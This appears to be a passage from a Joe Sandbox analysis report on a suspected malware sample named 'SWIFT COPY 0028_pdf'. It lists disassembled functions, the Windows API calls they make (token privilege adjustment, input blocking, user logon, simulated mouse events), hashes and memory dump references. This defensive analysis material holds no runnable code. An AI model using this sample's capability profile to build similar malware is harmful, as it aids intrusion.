                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0095ACC0), ref: 0095AB99
                                                                                    • CloseHandle.KERNEL32(?,?,0095ACC0), ref: 0095ABAB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                    • String ID:
                                                                                    • API String ID: 81990902-0
                                                                                    • Opcode ID: cf279dd0330eaf755972d947c78dec9924f08aef2c96e83add08c15572b55da8
                                                                                    • Instruction ID: 8b8247879299d0dc762289e7cfd0d30d8a42b248565b89b0862de897c3cdb36d
                                                                                    • Opcode Fuzzy Hash: cf279dd0330eaf755972d947c78dec9924f08aef2c96e83add08c15572b55da8
                                                                                    • Instruction Fuzzy Hash: DAE0E675414510AFE7252F55EC05D777BEDEF44321B108529F85B81870DB625C90DB94
                                                                                    Function 009481AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00946DB3,-0000031A,?,?,00000001), ref: 009481B1
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009481BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 9b51facbab5e3b3fc89196cef157b7c8aa7a713882be1697c3e6c3f7bd6ba846
                                                                                    • Instruction ID: 8ff370bc8f7169d03969b1486af3d4198e7bbe1bacb30e30ea2b173e6326ad5d
                                                                                    • Opcode Fuzzy Hash: 9b51facbab5e3b3fc89196cef157b7c8aa7a713882be1697c3e6c3f7bd6ba846
                                                                                    • Instruction Fuzzy Hash: 29B09231059608ABDF002BA1EC09B587F68EF0A65AF004010F60E448619F725510ABD2
                                                                                    Function 009277B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: f1f24cfa5cfe78c92eaf9e6a3c0b18f178e8497b7ff82c00a5461c5055f9defb
                                                                                    • Instruction ID: f56ac288e176cb1e30dd7a125df7315af9b7b62dce5d96bf05a9743f949868fb
                                                                                    • Opcode Fuzzy Hash: f1f24cfa5cfe78c92eaf9e6a3c0b18f178e8497b7ff82c00a5461c5055f9defb
                                                                                    • Instruction Fuzzy Hash: 55A25A74E04229CFCB24CFA8D4806ADFBB5FF49314F2581A9D859AB394D7349E81DB90
                                                                                    Function 0094D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 62295120a0c82eb61876b5269b8f1913ec718125d55422812e9cc17f2fc5db3b
                                                                                    • Instruction ID: 59bbfea69e3b0b04d4c51e2a7b8666004aec50049e362ce81845a2658e21c20c
                                                                                    • Opcode Fuzzy Hash: 62295120a0c82eb61876b5269b8f1913ec718125d55422812e9cc17f2fc5db3b
                                                                                    • Instruction Fuzzy Hash: AB320326D2AF014DD7239634D972336A29CEFB73D4F15D727E819B5AAAEF28C4835100
                                                                                    Function 009296C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 674341424-0
                                                                                    • Opcode ID: 985577c7894862c986fe02a86248c88adacaedcb8715ee5d448e6ae9b232ffa2
                                                                                    • Instruction ID: 940ceabbab242c8fe3f79f6cd38325ee58ae6e86125240e388c638f79db28361
                                                                                    • Opcode Fuzzy Hash: 985577c7894862c986fe02a86248c88adacaedcb8715ee5d448e6ae9b232ffa2
                                                                                    • Instruction Fuzzy Hash: A222ABB16083119FDB24DF18D890B6FB7E8AFC4310F10492DF89A97291DB71E944CB92
                                                                                    Function 0095038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4e51251d564f4e6cdf8ffd2d7408798e4ef1191774534e599b9762a3f6b63e60
                                                                                    • Instruction ID: c6d617a825c727503e025aa75002e21fbda58dd7912117a860efca46e9557969
                                                                                    • Opcode Fuzzy Hash: 4e51251d564f4e6cdf8ffd2d7408798e4ef1191774534e599b9762a3f6b63e60
                                                                                    • Instruction Fuzzy Hash: 9AB1C120D3AF414DD623A6398931336B65CAFBB2E5B92D71BFC1A74D62EB2185835180
                                                                                    Function 0096B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __time64.LIBCMT ref: 0096B6DF
                                                                                      • Part of subcall function 0094344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0096BDC3,00000000,?,?,?,?,0096BF70,00000000,?), ref: 00943453
                                                                                      • Part of subcall function 0094344A: __aulldiv.LIBCMT ref: 00943473
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                    • String ID:
                                                                                    • API String ID: 2893107130-0
                                                                                    • Opcode ID: 427b105c934e90df0424fb83fbcdb929e305105549d62fa0f193aa1d8acde61c
                                                                                    • Instruction ID: 7487e623ff7991889a93ac99dad7b86ac6ded4c26d7ea84300312a957d2e1458
                                                                                    • Opcode Fuzzy Hash: 427b105c934e90df0424fb83fbcdb929e305105549d62fa0f193aa1d8acde61c
                                                                                    • Instruction Fuzzy Hash: B1219D72634510CBC729CF28C881A92B7E5EB95320B648E6DE0E5CF2C0DB74AE45DB54
                                                                                    Function 00976AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • BlockInput.USER32(00000001), ref: 00976ACA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlockInput
                                                                                    • String ID:
                                                                                    • API String ID: 3456056419-0
                                                                                    • Opcode ID: 322e52938906d110cf6a2ef524444eb3cde555f3add5cced26e4e58a9984e3a8
                                                                                    • Instruction ID: 2b9a4529ed6c3f0ab7849d1b43fc1ea0e606d1d4487604ff141434f611f04d0f
                                                                                    • Opcode Fuzzy Hash: 322e52938906d110cf6a2ef524444eb3cde555f3add5cced26e4e58a9984e3a8
                                                                                    • Instruction Fuzzy Hash: E9E04836210214AFC700EF59D404E56B7ECAFB4751F04C856F949D7251DAB0F8048BA0
                                                                                    Function 009674BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009674DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: mouse_event
                                                                                    • String ID:
                                                                                    • API String ID: 2434400541-0
                                                                                    • Opcode ID: d152abab72d4e9f49758d8bdb952e4ee4ec5df80e0dabd56c2c7b86648936a29
                                                                                    • Instruction ID: 9ac5b53633f0d9f1ca5f11e49d7181e40331bca2675d25266949a9e183d006d4
                                                                                    • Opcode Fuzzy Hash: d152abab72d4e9f49758d8bdb952e4ee4ec5df80e0dabd56c2c7b86648936a29
                                                                                    • Instruction Fuzzy Hash: E6D05EA053C30538EC2807A48C0FF7A990EF3007C8F809689B082C94E1FC845801A132
                                                                                    Function 0095B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0095AD3E), ref: 0095B124
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LogonUser
                                                                                    • String ID:
                                                                                    • API String ID: 1244722697-0
                                                                                    • Opcode ID: 15eafb0802395bd5dea34692e68634bc2450606dce5ddcddcbbdf6a930c87fba
                                                                                    • Instruction ID: d2d7e8e403cf9578f3d27d07bea05a507b742c7fd6e3022c6c8ffbc60fbd2715
                                                                                    • Opcode Fuzzy Hash: 15eafb0802395bd5dea34692e68634bc2450606dce5ddcddcbbdf6a930c87fba
                                                                                    • Instruction Fuzzy Hash: 60D05E320A460EAEDF024FA4DC02EAE3F6AEB04700F408110FA12C50A0C671D531AB50
                                                                                    Function 0099B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: NameUser
                                                                                    • String ID:
                                                                                    • API String ID: 2645101109-0
                                                                                    • Opcode ID: 9e073afef6d9614ffa7d052d58942b943d4777e5cd708b368d039f3f2e98a9a6
                                                                                    • Instruction ID: d3754f660d1271ec1953e1863e0d7f4f2501b437fa0c5db25efadb4aafb844c8
                                                                                    • Opcode Fuzzy Hash: 9e073afef6d9614ffa7d052d58942b943d4777e5cd708b368d039f3f2e98a9a6
                                                                                    • Instruction Fuzzy Hash: B6C04CB1405119DFCB51CBC4C9449EEB7BCAB05301F104491A146F1110D7749B859BB2
                                                                                    Function 00948189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0094818F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: f4f254c54e97a3b49f6ec04f4a79ee9aad5fd38358059706c99775728ccef9e8
                                                                                    • Instruction ID: f139bad08457cd25b417c6ac4a801a981d1b384399d3eb2ed9cb80cf39f93bc1
                                                                                    • Opcode Fuzzy Hash: f4f254c54e97a3b49f6ec04f4a79ee9aad5fd38358059706c99775728ccef9e8
                                                                                    • Instruction Fuzzy Hash: 75A0113000820CAB8F002B82EC088883F2CEA022A8B000020F80E008208B22AA20AAC2
                                                                                    Function 0092E3B0 Relevance: .5, Instructions: 540COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 910ba06ad19cdd3cae8680650e79897b5bcba2828889f0aaa16c497965781f88
                                                                                    • Instruction ID: 64efa649684216e2f8c7b8accc5c1e12e83d14d98dd1cf4db0ee5ab6f10ce961
                                                                                    • Opcode Fuzzy Hash: 910ba06ad19cdd3cae8680650e79897b5bcba2828889f0aaa16c497965781f88
                                                                                    • Instruction Fuzzy Hash: 8A22CE70E04226CFDB24DF58E490BBAB7B4FF58300F148469E98A9B355E735AD81CB91
                                                                                    Function 009293F0 Relevance: .5, Instructions: 531COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c0f176939d425c32ad76bdc73159cf7f41b56286d503d4797b2cc203b988e330
                                                                                    • Instruction ID: 0d8c5385bfdec6694f7e7a35317adaee9385b183f230113668a6e28dd3341abe
                                                                                    • Opcode Fuzzy Hash: c0f176939d425c32ad76bdc73159cf7f41b56286d503d4797b2cc203b988e330
                                                                                    • Instruction Fuzzy Hash: A9127E70A00219AFDF14DFA9E985AEEB7F5FF48300F204529E806E7654EB35AD14CB50
                                                                                    Function 0092AF50 Relevance: .5, Instructions: 514COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 3728558374-0
                                                                                    • Opcode ID: 521b468d9da66ac61e7566cafc0c39b63bcff7d73bf350e64bf2378d83aecd3e
                                                                                    • Instruction ID: 9ee14f26500d6a04fdde84908bc9258e848308a4d1e67e0093fda22e555fa090
                                                                                    • Opcode Fuzzy Hash: 521b468d9da66ac61e7566cafc0c39b63bcff7d73bf350e64bf2378d83aecd3e
                                                                                    • Instruction Fuzzy Hash: 1C02B271A00219EBCF14DF68E991BAEB7F5FF84300F108469E806DB299EB35D915CB91
                                                                                    Function 009402A4 Relevance: .3, Instructions: 345COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                    • Instruction ID: 6a59ba4afd10e0c967010effad8d24b52444185355fa9bf9565ec667e42c5e5f
                                                                                    • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                    • Instruction Fuzzy Hash: 74C195322055A30ADF2D463A847483EFAA55EE27B171A076DD8B3CB5D5FF34C524EA20
                                                                                    Function 009406D9 Relevance: .3, Instructions: 341COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                    • Instruction ID: cd159f9b70d8c7a8dba0f02b4e4da5313b8d8715702c08ce21e8545d99d6cf04
                                                                                    • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                    • Instruction Fuzzy Hash: D9C1B2322091930ADF6D463AC43483EBAA55EE2BB171A076DD4B3CB5D5EF30D524EA20
                                                                                    Function 0093FA57 Relevance: .3, Instructions: 323COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                    • Instruction ID: 4323baa6fa01eeadae1d16eb56826f23d1c8da0d334f47cf2785c76d3e23d2f7
                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
